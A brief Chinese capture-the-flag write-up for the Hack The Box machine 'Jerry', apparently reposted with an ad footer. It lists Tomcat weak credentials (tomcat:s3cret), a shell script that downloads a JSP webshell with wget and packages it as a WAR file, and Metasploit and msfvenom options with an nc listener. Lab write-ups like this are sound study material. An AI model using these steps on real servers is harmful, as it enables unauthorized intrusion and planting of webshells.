HTB-Jerry
easy box.
首先nmap开路:
找到8080端口:
Tomcat字典:
https://raw.githubusercontent…
找到弱口令tomcat:s3cret
部署war包:
方法1:
官方walkthrough上的:
#!/bin/sh wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp mkdir wshell cp index.jsp wshell/ cd wshell jar -cvf ../wshell.war
部署wshell:
路径比较深
拿到flag
方法2:
msf使用multi/http/tomcat_mgr_upload
方法3:
msfvenom生成war包
上传war包后nc:
[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]